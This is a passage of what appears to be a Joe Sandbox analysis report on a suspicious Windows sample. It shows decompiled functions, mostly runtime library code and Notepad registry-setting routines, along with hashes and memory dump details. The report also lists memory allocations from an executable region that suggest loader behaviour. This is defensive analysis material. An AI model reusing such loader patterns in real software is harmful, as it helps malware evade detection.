                    							E00285760( *((intOrPtr*)(_t33 + 8)), 0,  *((intOrPtr*)(_t33 + 0xc)));
                    						}
                    						 *((intOrPtr*)(E00283CF8(_t41))) = 0x16;
                    						E00283CA6();
                    						goto L6;
                    					}
                    				}
                    				return E00283D95(_t19);
                    			}







                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __lock_file_memset
                    • String ID:
                    • API String ID: 26237723-0
                    • Opcode ID: 3acf552402e448e53af1852a6ba4b5b59c61d4da5173e82e83201847de7a9b34
                    • Instruction ID: 2e61678833715394430cffa3a5e4ba289bc7205b5e0b938e9d9c7c946a76f696
                    • Opcode Fuzzy Hash: 3acf552402e448e53af1852a6ba4b5b59c61d4da5173e82e83201847de7a9b34
                    • Instruction Fuzzy Hash: 7B011E7982221AEBCF21FFA5C80289E7B61AF04B50F008125F828551E5D7768771DF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 86%
                    			E00283270(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                    				signed int _t15;
                    				signed int _t17;
                    				void* _t26;
                    				intOrPtr _t28;
                    
                    				_push(0xc);
                    				_push(0x292000);
                    				E00283D50(__ebx, __edi, __esi);
                    				_t28 =  *((intOrPtr*)(_t26 + 8));
                    				_t29 = _t28 != 0;
                    				if(_t28 != 0) {
                    					E00283652( *((intOrPtr*)(_t26 + 8)));
                    					_t5 = _t26 - 4;
                    					 *_t5 =  *(_t26 - 4) & 0x00000000;
                    					__eflags =  *_t5;
                    					_t15 = E002830DC( *((intOrPtr*)(_t26 + 8))); // executed
                    					 *(_t26 - 0x1c) = _t15;
                    					 *(_t26 - 4) = 0xfffffffe;
                    					E002832CB();
                    					_t17 =  *(_t26 - 0x1c);
                    				} else {
                    					 *((intOrPtr*)(E00283CF8(_t29))) = 0x16;
                    					_t17 = E00283CA6() | 0xffffffff;
                    				}
                    				return E00283D95(_t17);
                    			}








                    APIs
                    • __lock_file.LIBCMT ref: 002832A0
                    • __ftell_nolock.LIBCMT ref: 002832AD
                      • Part of subcall function 00283CF8: __getptd_noexit.LIBCMT ref: 00283CF8
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __ftell_nolock__getptd_noexit__lock_file
                    • String ID:
                    • API String ID: 2999321469-0
                    • Opcode ID: da310b7aec220e14de07f9806e15a2cfb21d8b3b1d62843db14101d88a46fbfa
                    • Instruction ID: 137705a221588c4ce1ae092668c335b9449a54fba8202f34c968e73b62f953d1
                    • Opcode Fuzzy Hash: da310b7aec220e14de07f9806e15a2cfb21d8b3b1d62843db14101d88a46fbfa
                    • Instruction Fuzzy Hash: 79F03039523205EADB10FF74CC0679D3AA0AF01B61F208225F824A90E5DB748B719F01
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                      • Part of subcall function 005F0EBF: GetSystemInfo.KERNELBASE(?), ref: 005F0EDC
                    • VirtualAllocExNuma.KERNELBASE(00000000), ref: 005F0F82
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: AllocInfoNumaSystemVirtual
                    • String ID:
                    • API String ID: 449148690-0
                    • Opcode ID: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
                    • Instruction ID: cb0cf9fa437dd2fbceb29a5761732aa66d46779433c7fb2d7f00a896cca2c57d
                    • Opcode Fuzzy Hash: 02fd5776a212e4e28df96bd92848bb9bff485d1fd05fc97cd13e01601c6e9ece
                    • Instruction Fuzzy Hash: 4CF0E170E4430EBAEB207BF0490E77D7E6CBF80301F546955B7046A1C3DE7C56004665
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 536 282d3e-282d54 call 282c80
                    C-Code - Quality: 25%
                    			E00282D3E(intOrPtr _a4, intOrPtr _a8) {
                    				void* __ebp;
                    				void* _t3;
                    				void* _t4;
                    				void* _t5;
                    				void* _t6;
                    				void* _t9;
                    
                    				_push(0x40);
                    				_push(_a8);
                    				_push(_a4);
                    				_t3 = E00282C80(_t4, _t5, _t6, _t9); // executed
                    				return _t3;
                    			}










                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: __wfsopen
                    • String ID:
                    • API String ID: 197181222-0
                    • Opcode ID: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                    • Instruction ID: e24709ad601df7f3b306a2815c1c74b4b7b40c9a020381d0239680f03d6b6ae2
                    • Opcode Fuzzy Hash: b5c1dd7f54315c70b952dff0fe33ec93e52da603c388fdf08d18a597afa050f6
                    • Instruction Fuzzy Hash: 4DC09B7644010C77CF112942EC06E593F59D7C0764F058011FB1C191619573D5759685
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • RtlEncodePointer.NTDLL(00000000,0028A1B8,00295228,00000314,00000000,?,?,?,?,?,00286199,00295228,Microsoft Visual C++ Runtime Library,00012010), ref: 0028675A
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: EncodePointer
                    • String ID:
                    • API String ID: 2118026453-0
                    • Opcode ID: dc997dafe1257d8eb0c03e11c7218a55c38ddadb6d9cd29f433b09016a784d5c
                    • Instruction ID: 919f0ec61876a3b9223f87cf77f9dc61ab442555404c466ac92d52f71c0a359f
                    • Opcode Fuzzy Hash: dc997dafe1257d8eb0c03e11c7218a55c38ddadb6d9cd29f433b09016a784d5c
                    • Instruction Fuzzy Hash:
                    Uniqueness

                    Uniqueness Score: -1.00%

                    APIs
                    • VirtualAlloc.KERNELBASE(00000000,17D78400,00003000,00000004), ref: 005F0E5C
                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: AllocVirtual
                    • String ID:
                    • API String ID: 4275171209-0
                    • Opcode ID: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
                    • Instruction ID: d70fcdc4216b694d13596e10d25808f6d10743b99d4d9e1b052c48bb8b4a62cc
                    • Opcode Fuzzy Hash: e81709d29aeacffc972b816f3e2c3b8ecd6306ca993244f022616891f9074ab1
                    • Instruction Fuzzy Hash: 1E113670D0021CEFDB00EBA8CD49BBEBBB8BB04304F645895EA40B7292D6794A448B90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00282200(intOrPtr _a4) {
                    				void* _v8;
                    				int _v12;
                    				void* _t24;
                    				void* _t30;
                    				int _t35;
                    				void* _t43;
                    				void* _t58;
                    				int _t60;
                    				intOrPtr _t61;
                    				void* _t65;
                    
                    				_v12 = lstrlenW( *(_a4 + 0x10));
                    				SendMessageW( *0x2970ec, 0xb1, 0, 0);
                    				_t4 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
                    				_t60 = _t4;
                    				_t24 = HeapAlloc(GetProcessHeap(), 0, _t60 + _t60);
                    				_t58 = _t24;
                    				if(_t58 == 0) {
                    					L12:
                    					return _t24;
                    				} else {
                    					do {
                    						GetWindowTextW( *0x2970ec, _t58, _t60);
                    						SendMessageW( *0x2970ec, 0xb0, 0,  &_v8);
                    						_t61 = _a4;
                    						_t30 = ( *(_t61 + 0xc) & 0x00000005) - 1;
                    						if(_t30 == 0) {
                    							goto L6;
                    						} else {
                    							_t24 = _t30 - 4;
                    							if(_t24 != 0) {
                    								goto L12;
                    							} else {
                    								_t65 = _v8 -  ~_t58;
                    								L6:
                    								if(_t65 == 0) {
                    									_v8 = 0xffffffff;
                    								}
                    								HeapFree(GetProcessHeap(), 0, _t58);
                    								_t35 = _v8;
                    								if(_t35 == 0xffffffff) {
                    									return SendMessageW( *0x2970ec, 0xb1, 0, 0);
                    								}
                    								goto L9;
                    							}
                    						}
                    						goto L13;
                    						L9:
                    						SendMessageW( *0x2970ec, 0xb1, _t35, _t35 + _v12);
                    						SendMessageW( *0x2970ec, 0xc2, 1,  *(_t61 + 0x14));
                    						_t16 = GetWindowTextLengthW( *0x2970ec) + 1; // 0x1
                    						_t60 = _t16;
                    						_t43 = HeapAlloc(GetProcessHeap(), 0, _t60 + _t60);
                    						_t58 = _t43;
                    					} while (_t58 != 0);
                    					return _t43;
                    				}
                    				L13:
                    			}














                    APIs
                    • lstrlenW.KERNEL32(?), ref: 00282210
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 0028222F
                    • GetWindowTextLengthW.USER32(?), ref: 00282237
                    • GetProcessHeap.KERNEL32(00000000), ref: 00282246
                    • HeapAlloc.KERNEL32(00000000), ref: 0028224D
                    • GetWindowTextW.USER32 ref: 00282269
                    • SendMessageW.USER32(?,000000B0,00000000,?), ref: 00282281
                    • GetProcessHeap.KERNEL32(00000000,00000000), ref: 002822BA
                    • HeapFree.KERNEL32(00000000), ref: 002822BD
                    • SendMessageW.USER32(?,000000B1,?), ref: 002822DE
                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 002822F2
                    • GetWindowTextLengthW.USER32(?), ref: 002822FA
                    • GetProcessHeap.KERNEL32(00000000), ref: 00282309
                    • HeapAlloc.KERNEL32(00000000), ref: 0028230C
                    • SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 00282335
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: Heap$MessageSend$ProcessTextWindow$AllocLength$Freelstrlen
                    • String ID: Oqt
                    • API String ID: 3644332920-2617001805
                    • Opcode ID: 6cf8f58e82c58e0990c099f4d32a03d8eba7347ebfce06e0df65c9f23261b0f8
                    • Instruction ID: ac731161e8f10dc9904bad2bd5f6fb28fcc837cc38ef852e3bab359230ced980
                    • Opcode Fuzzy Hash: 6cf8f58e82c58e0990c099f4d32a03d8eba7347ebfce06e0df65c9f23261b0f8
                    • Instruction Fuzzy Hash: 3B318076610309EFD710DFA4EC8DF6AB778EB88714F50810AF909972E0CA71E905CB60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 85%
                    			E002879C4(intOrPtr __eax, intOrPtr __ebx, intOrPtr __ecx, intOrPtr __edx, intOrPtr __edi, intOrPtr __esi, char _a4) {
                    				intOrPtr _v0;
                    				void* _v804;
                    				intOrPtr _v808;
                    				intOrPtr _v812;
                    				intOrPtr _t6;
                    				intOrPtr _t11;
                    				intOrPtr _t12;
                    				intOrPtr _t13;
                    				long _t17;
                    				intOrPtr _t21;
                    				intOrPtr _t22;
                    				intOrPtr _t25;
                    				intOrPtr _t26;
                    				intOrPtr _t27;
                    				intOrPtr* _t31;
                    				void* _t34;
                    
                    				_t27 = __esi;
                    				_t26 = __edi;
                    				_t25 = __edx;
                    				_t22 = __ecx;
                    				_t21 = __ebx;
                    				_t6 = __eax;
                    				_t34 = _t22 -  *0x294288; // 0x70fbf70a
                    				if(_t34 == 0) {
                    					asm("repe ret");
                    				}
                    				 *0x295d30 = _t6;
                    				 *0x295d2c = _t22;
                    				 *0x295d28 = _t25;
                    				 *0x295d24 = _t21;
                    				 *0x295d20 = _t27;
                    				 *0x295d1c = _t26;
                    				 *0x295d48 = ss;
                    				 *0x295d3c = cs;
                    				 *0x295d18 = ds;
                    				 *0x295d14 = es;
                    				 *0x295d10 = fs;
                    				 *0x295d0c = gs;
                    				asm("pushfd");
                    				_pop( *0x295d40);
                    				 *0x295d34 =  *_t31;
                    				 *0x295d38 = _v0;
                    				 *0x295d44 =  &_a4;
                    				 *0x295c80 = 0x10001;
                    				_t11 =  *0x295d38; // 0x0
                    				 *0x295c34 = _t11;
                    				 *0x295c28 = 0xc0000409;
                    				 *0x295c2c = 1;
                    				_t12 =  *0x294288; // 0x70fbf70a
                    				_v812 = _t12;
                    				_t13 =  *0x29428c; // 0x8f0408f5
                    				_v808 = _t13;
                    				 *0x295c78 = IsDebuggerPresent();
                    				_push(1);
                    				E002879BC(_t14);
                    				SetUnhandledExceptionFilter(0);
                    				_t17 = UnhandledExceptionFilter("(\)");
                    				if( *0x295c78 == 0) {
                    					_push(1);
                    					E002879BC(_t17);
                    				}
                    				return TerminateProcess(GetCurrentProcess(), 0xc0000409);
                    			}




















                    APIs
                    • IsDebuggerPresent.KERNEL32 ref: 0028ACFA
                    • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0028AD0F
                    • UnhandledExceptionFilter.KERNEL32((\)), ref: 0028AD1A
                    • GetCurrentProcess.KERNEL32(C0000409), ref: 0028AD36
                    • TerminateProcess.KERNEL32(00000000), ref: 0028AD3D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                    • String ID: (\)
                    • API String ID: 2579439406-2644722814
                    • Opcode ID: 79c1b763d1e6295de655ba4577400732bd1d13d37f295083e9f6f46fd72ae7b8
                    • Instruction ID: 9620e6606564b849e26227014aa917bb265010fab49c45915e8257f0604a37a4
                    • Opcode Fuzzy Hash: 79c1b763d1e6295de655ba4577400732bd1d13d37f295083e9f6f46fd72ae7b8
                    • Instruction Fuzzy Hash: EF21B574A11B28DFD746EF69FC8D6483BB4BB48314F50441BE908973B0E7B059818F65
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E00285D3D() {
                    
                    				SetUnhandledExceptionFilter(E00285CFB);
                    				return 0;
                    			}




                    APIs
                    • SetUnhandledExceptionFilter.KERNEL32(Function_00005CFB), ref: 00285D42
                    Memory Dump Source
                    • Source File: 00000001.00000002.308786204.0000000000281000.00000020.00000001.01000000.00000004.sdmp, Offset: 00280000, based on PE: true
                    • Associated: 00000001.00000002.308778219.0000000000280000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308809959.0000000000290000.00000002.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308823616.0000000000294000.00000004.00000001.01000000.00000004.sdmp
                    • Associated: 00000001.00000002.308829404.0000000000299000.00000002.00000001.01000000.00000004.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_280000_tchnhwrvi.jbxd
                    Similarity
                    • API ID: ExceptionFilterUnhandled
                    • String ID:
                    • API String ID: 3192549508-0
                    • Opcode ID: 737f6da160a6cd411d3faacc935d05ed99bca8f4e6618e33a3cfb4fc0a1a54ad
                    • Instruction ID: fec061953adea3afa956e993ede28e39278b5b0e52b742e8dd106bb2ab45449a
                    • Opcode Fuzzy Hash: 737f6da160a6cd411d3faacc935d05ed99bca8f4e6618e33a3cfb4fc0a1a54ad
                    • Instruction Fuzzy Hash: 8E9002742626184AC65427706C8E5067A905A4A70674244536445C4494DBA044515A55
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                    • Instruction ID: c0f60065fa6f09f5be140be15ffca892e025ade8d5183204ad7df17cf4a70c3b
                    • Opcode Fuzzy Hash: 6a074607bc74a68e46ffcf8def79e123d6f3babf0396bd4cc77b36b90dcd7b6b
                    • Instruction Fuzzy Hash: EF11A036600119AFC720EF69C884DBABBE9FF547A47088015FD55CB252E338ED81C764
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                    • Instruction ID: af42c075d1253dd16f145a27aaf7b9bfceb0ba95131701d434892d3732955da5
                    • Opcode Fuzzy Hash: ec8e751651157bc76042a6f737d25c3298a3c098193b98f67a4d4adab9605e7b
                    • Instruction Fuzzy Hash: 03E09235264149EFCB00CBA8CD45D35B3F8FB08320B180690F915C73E1E638ED00D650
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                    • Instruction ID: b1a56155d9af72e3844c71132895c41c1e3339588fed41611b62442a3ef64cb8
                    • Opcode Fuzzy Hash: 14c979a1a0daa279b65c5726769cbc87c4fd01d1be4397ac1552cbcc502d36f8
                    • Instruction Fuzzy Hash: A5E04F326506189BC7719B59CC44DA6FBE8FB887B0B5D5825EE4997652C234FC01C790
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000001.00000002.308878721.00000000005F0000.00000040.00001000.00020000.00000000.sdmp, Offset: 005F0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_5f0000_tchnhwrvi.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                    • Instruction ID: 01513cdb45ce42654985ae443ff07ed2023d2f9c2cc80418f216d1c85a703bac
                    • Opcode Fuzzy Hash: 7c05f99247aa81ce170190a3f42a6638173cba83a8e8f878aed30f5516b3ecb7
                    • Instruction Fuzzy Hash: ECC00139661A40CFCA55CF08C194E00B3F4FB5D760B068491E906CB732C234ED40DA40
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 98%
                    			E00281290() {
                    				void* _v8;
                    				char _v12;
                    				char _v16;
                    				int _v20;
                    				intOrPtr _v24;
                    				intOrPtr _v28;
                    				char _v32;
                    				struct _WINDOWPLACEMENT _v64;
                    				long _t80;
                    				int _t126;
                    				char _t173;
                    				char _t174;
                    				intOrPtr _t175;
                    				intOrPtr _t177;
                    				signed int _t194;
                    
                    				_t80 = RegCreateKeyExW(0x80000001, L"Software\\Microsoft\\Notepad", 0, 0, 0, 0xf003f, 0,  &_v8,  &_v20);
                    				if(_t80 == 0) {
                    					_v64.length = 0x2c;
                    					GetWindowPlacement( *0x2970e4,  &_v64);
                    					 *0x295f70 = _v28;
                    					 *0x295f68 = _v64.rcNormalPosition;
                    					 *0x295f74 = _v24;
                    					 *0x295f6c = _v32;
                    					_v12 =  *0x29715c;
                    					RegSetValueExW(_v8, L"fWrap", 0, 4,  &_v12, 4);
                    					_t173 =  *0x295f68; // 0x0
                    					_v12 = _t173;
                    					RegSetValueExW(_v8, L"iWindowPosX", 0, 4,  &_v12, 4);
                    					_t174 =  *0x295f6c; // 0x0
                    					_v12 = _t174;
                    					RegSetValueExW(_v8, L"iWindowPosY", 0, 4,  &_v12, 4);
                    					_t175 =  *0x295f70; // 0x0
                    					_v12 = _t175 -  *0x295f68;
                    					RegSetValueExW(_v8, L"iWindowPosDX", 0, 4,  &_v12, 4);
                    					_t177 =  *0x295f74; // 0x0
                    					_v12 = _t177 -  *0x295f6c;
                    					RegSetValueExW(_v8, L"iWindowPosDY", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297117 & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfCharSet", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297119 & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfClipPrecision", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297108;
                    					RegSetValueExW(_v8, L"lfEscapement", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297114 & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfItalic", 0, 4,  &_v12, 4);
                    					_v12 =  *0x29710c;
                    					RegSetValueExW(_v8, L"lfOrientation", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297118 & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfOutPrecision", 0, 4,  &_v12, 4);
                    					_v12 =  *0x29711b & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfPitchAndFamily", 0, 4,  &_v12, 4);
                    					_v12 =  *0x29711a & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfQuality", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297116 & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfStrikeOut", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297115 & 0x000000ff;
                    					RegSetValueExW(_v8, L"lfUnderline", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297110;
                    					RegSetValueExW(_v8, L"lfWeight", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297e50;
                    					RegSetValueExW(_v8, L"iMarginTop", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297e54;
                    					RegSetValueExW(_v8, L"iMarginBottom", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297e58;
                    					RegSetValueExW(_v8, L"iMarginLeft", 0, 4,  &_v12, 4);
                    					_v12 =  *0x297e5c;
                    					RegSetValueExW(_v8, L"iMarginRight", 0, 4,  &_v12, 4);
                    					_t194 =  *0x2970f8;
                    					_v12 = _t194;
                    					RegSetValueExW(_v8, L"bStatusBar", 0, 4,  &_v12, 4);
                    					_t126 = E00281020();
                    					asm("cdq");
                    					_v16 = MulDiv(( *0x297100 ^ _t194) - _t194, 0x2d0, _t126);
                    					RegSetValueExW(_v8, L"iPointSize", 0, 4,  &_v16, 4);
                    					RegSetValueExW(_v8, L"lfFaceName", 0, 1, 0x29711c, lstrlenW(0x29711c) + _t133);
                    					RegSetValueExW(_v8, L"szHeader", 0, 1, 0x297e60, lstrlenW(0x297e60) + _t136);
                    					RegSetValueExW(_v8, L"szTrailer", 0, 1, 0x298068, lstrlenW(0x298068) + _t139);
                    					return RegCloseKey(_v8);
                    				}
                    				return _t80;
                    			}



















                    APIs
                    • RegCreateKeyExW.ADVAPI32(80000001,Software\Microsoft\Notepad,00000000,00000000,00000000,000F003F,00000000,?,?), ref: 002812B5
                    • GetWindowPlacement.USER32(?,?), ref: 002812D6
                    • RegSetValueExW.ADVAPI32(?,fWrap,00000000,00000004,?,00000004), ref: 00281321
                    • RegSetValueExW.ADVAPI32(?,iWindowPosX,00000000,00000004,?,00000004), ref: 0028133F
                    • RegSetValueExW.ADVAPI32(?,iWindowPosY,00000000,00000004,?,00000004), ref: 0028135D
                    • RegSetValueExW.ADVAPI32(?,iWindowPosDX,00000000,00000004,?,00000004), ref: 00281381
                    • RegSetValueExW.ADVAPI32(?,iWindowPosDY,00000000,00000004,?,00000004), ref: 002813A5
                    • RegSetValueExW.ADVAPI32(?,lfCharSet,00000000,00000004,?,00000004), ref: 002813C4
                    • RegSetValueExW.ADVAPI32(?,lfClipPrecision,00000000,00000004,?,00000004), ref: 002813E3
                    • RegSetValueExW.ADVAPI32(?,lfEscapement,00000000,00000004,?,00000004), ref: 00281401
                    • RegSetValueExW.ADVAPI32(?,lfItalic,00000000,00000004,?,00000004), ref: 00281420
                    • RegSetValueExW.ADVAPI32(?,lfOrientation,00000000,00000004,?,00000004), ref: 0028143E
                    • RegSetValueExW.ADVAPI32(?,lfOutPrecision,00000000,00000004,?,00000004), ref: 0028145D
                    • RegSetValueExW.ADVAPI32(?,lfPitchAndFamily,00000000,00000004,?,00000004), ref: 0028147C
                    • RegSetValueExW.ADVAPI32(?,lfQuality,00000000,00000004,?,00000004), ref: 0028149B
                    • RegSetValueExW.ADVAPI32(?,lfStrikeOut,00000000,00000004,?,00000004), ref: 002814BA
                    • RegSetValueExW.ADVAPI32(?,lfUnderline,00000000,00000004,?,00000004), ref: 002814D9
                    • RegSetValueExW.ADVAPI32(?,lfWeight,00000000,00000004,?,00000004), ref: 002814F7
                    • RegSetValueExW.ADVAPI32(?,iMarginTop,00000000,00000004,?,00000004), ref: 00281515
                    • RegSetValueExW.ADVAPI32(?,iMarginBottom,00000000,00000004,?,00000004), ref: 00281533
                    • RegSetValueExW.ADVAPI32(?,iMarginLeft,00000000,00000004,?,00000004), ref: 00281551
                    • RegSetValueExW.ADVAPI32(?,iMarginRight,00000000,00000004,?,00000004), ref: 0028156F
                    • RegSetValueExW.ADVAPI32(?,bStatusBar,00000000,00000004,?,00000004), ref: 0028158D
                      • Part of subcall function 00281020: RegOpenKeyW.ADVAPI32(80000005,Software\Fonts,?), ref: 0028103A
                      • Part of subcall function 00281020: RegQueryValueExW.ADVAPI32(?,LogPixels,00000000,00281594,?,?,?,00281594), ref: 00281062
                      • Part of subcall function 00281020: RegCloseKey.ADVAPI32(?,?,00281594), ref: 0028107F
                    • MulDiv.KERNEL32(?,000002D0,00000000), ref: 002815A5
                    • RegSetValueExW.ADVAPI32(?,iPointSize,00000000,00000004,?,00000004), ref: 002815C1
                    • lstrlenW.KERNEL32(0029711C), ref: 002815CE
                    • RegSetValueExW.ADVAPI32(?,lfFaceName,00000000,00000001,0029711C,00000000), ref: 002815E5
                    • lstrlenW.KERNEL32(00297E60), ref: 002815EC
                    • RegSetValueExW.ADVAPI32(?,szHeader,00000000,00000001,00297E60,00000000), ref: 00281603
                    • lstrlenW.KERNEL32(00298068), ref: 0028160A
                    • RegSetValueExW.ADVAPI32(?,szTrailer,00000000,00000001,00298068,00000000), ref: 00281621
                    • RegCloseKey.ADVAPI32(?), ref: 00281627
                    Strings
                    Memory Dump Source
